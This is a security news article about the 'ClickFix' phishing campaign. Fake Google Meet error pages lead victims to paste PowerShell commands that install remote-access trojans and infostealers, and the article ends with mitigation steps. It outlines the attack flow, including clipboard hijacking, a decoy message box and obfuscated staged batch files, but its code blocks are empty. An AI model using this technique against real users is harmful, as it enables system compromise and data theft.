A sophisticated new cyberattack campaign, dubbed "ClickFix," is exploiting user trust in Google Meet. This social engineering attack works by deploying highly deceptive, fake meeting pages to trick victims into executing harmful PowerShell commands. This campaign, which targets both Windows and macOS systems, bypasses many traditional security measures by cleverly leveraging advanced social engineering tactics.

The modus operandi of the ClickFix campaign begins with seemingly legitimate phishing emails. These emails contain links that are meticulously crafted to mimic genuine Google Meet invitations. Unsuspecting users who click on these deceptive links are then redirected to fraudulent webpages that perfectly replicate the familiar Google Meet interface.

However, instead of prompting for login credentials, the malicious site displays a fabricated error message—frequently a "Microphone Permission Denied" alert. To resolve this non-existent issue, users are then instructed to copy and paste a provided PowerShell command directly into their system terminal.

The technical deception is initiated through a JavaScript function embedded within the fake page. This function silently copies a malicious PowerShell command to the clipboard of the user, ready for pasting:

Once executed, this insidious command grants attackers full control over the compromised system. The initial payload often displays a reassuring "Verification complete!" message box using [System.Windows.Forms.MessageBox]::Show() to keep the victim unsuspecting while malicious operations unfold in the background.

PowerShell Code

Subsequent stages involve downloading additional obfuscated batch files (like noanti-vm.bat) that employ environment variable manipulation and string slicing to reconstruct commands, further thwarting detection:

Plaintext

This decodes to:

Plaintext

The ultimate goal of these attacks is to install various Remote Access Trojans (RATs) and infostealers. These malicious tools, including AsyncRAT, StealC, Rhadamanthys, Lumma Stealer, DarkGate, and, for macOS users, Atomic Stealer malware, enable threat actors to exfiltrate sensitive data, establish persistence on the system, and facilitate lateral movement within networks.

Behind the Attack: Threat Actors & Their Tactics

What makes the ClickFix campaign particularly dangerous is its reliance on direct, manual user interaction. Since the malicious PowerShell code is executed by the user rather than being automatically triggered by a downloaded file, it can bypass many conventional security tools designed to monitor automated script executions or file downloads.

Investigations have attributed the infrastructure behind this campaign to organized trafficker groups such as Slavic Nation Empire and Scamquerteo. These groups are known for sharing templates and backend resources, allowing them to scale their deceptive attacks across multiple industries. Campaigns leveraging these tactics have been observed since as early as March 2024.

Recommended Mitigation Actions

Cybersecurity experts are urging organizations and individuals to implement robust mitigation strategies, as mentioned below:

• Enforce Strict PowerShell Execution Policies: Configure systems to allow only digitally signed PowerShell scripts to run.
• Employ Application Controls: Restrict the execution of unauthorized programs on endpoints.
• Comprehensive User Training: Educate users extensively on recognizing social engineering tactics, suspicious email invitations, and the inherent dangers of copying and pasting commands from untrusted sources. Emphasize that legitimate services will never require users to manually execute PowerShell commands from email instructions.
• Web Content Filtering: Implement solutions to block access to known malicious domains associated with these campaigns.
• Regular System Scanning: Continuously monitor systems for unauthorized scripts and malware.
• Endpoint Detection and Response (EDR) Solutions: Utilize EDR tools capable of monitoring PowerShell execution and identifying unusual activity.

The stark reality is that a single, seemingly innocuous action—copying and pasting a command from an untrusted source- can lead to a complete system compromise. As these social engineering attacks become increasingly sophisticated and convincing, ongoing user education combined with robust, layered security controls remains essential in defending against this evolving threat landscape.